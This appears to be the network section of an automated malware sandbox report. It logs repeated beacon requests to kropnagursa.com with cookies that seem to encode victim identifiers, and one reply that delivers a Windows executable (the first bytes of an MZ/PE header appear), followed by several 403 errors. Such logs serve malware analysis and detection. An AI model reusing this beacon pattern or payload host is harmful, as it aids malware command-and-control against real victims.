            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 02 Feb 2023 20:16:56 GMTContent-Type: application/octet-streamContent-Length: 1597952Connection: closeLast-Modified: Thu, 02 Feb 2023 11:21:46 GMTETag: "186200-5f3b5c5294680"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d6 11 00 00 50 06 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 18 00 00 04 00 00 9d 5f 19 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 50 c8 15 00 34 50 00 00 84 18 16 00 40 01 00 00 00 90 18 00 a0 06 00 00 00 00 18 00 28 77 00 00 00 00 00 00 00 00 00 00 00 a0 18 00 44 1b 00 00 00 a0 17 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 71 13 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 21 16 00 e0 07 00 00 28 c2 15 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 27 d5 11 00 00 10 00 00 00 d6 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc aa 05 00 00 f0 11 00 00 ac 05 00 00 da 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 75 69 6c 64 69 64 89 00 00 00 00 a0 17 00 00 02 00 00 00 86 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 47 00 00 00 b0 17 00 00 04 00 00 00 88 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 77 00 00 00 00 18 00 00 78 00 00 00 8c 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 28 00 00 00 00 80 18 00 00 02 00 00 00 04 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6b 35 00 00 00 90 18 00 00 40 00 00 00 06 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 44 1b 00 00 00 d0 18 00 00 1c 00 00 00 46 18 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:16:58 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:16:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:16:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
